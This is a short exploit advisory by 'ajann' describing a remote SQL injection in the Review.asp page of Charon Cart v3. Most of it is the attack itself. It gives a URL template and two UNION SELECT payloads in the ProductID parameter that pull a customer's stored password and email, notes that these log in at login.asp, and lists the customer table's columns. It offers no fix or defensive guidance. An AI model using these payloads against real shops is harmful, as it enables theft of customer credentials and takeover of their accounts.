Vulnerability Report

************************************************************************
*******

# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability

# Author : ajann

# Script Page : http://www.charon.co.uk

# Exploit;

************************************************************************
*******

###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]

Example:

//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20C
ustomers%20Where%20CustomerID%20=%201

//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Cust
omers%20Where%20CustomerID%20=%201

Email and Password ==> login.asp [L0gin P4Ge]

Columns;

"""""""""""""""""""""

CustomerID

"""""""""""""""""""""

CustomerEmail

"""""""""""""""""""""

CustomerPassword

"""""""""""""""""""""

ShipCountry

"""""""""""""""""""""

Phone

"""""""""""""""""""""

.........

"""""""""""""""""""""

....

"""""""""""""""""""""

# ajann,Turkey

# ...

# Im not Hacker!

[ reply ]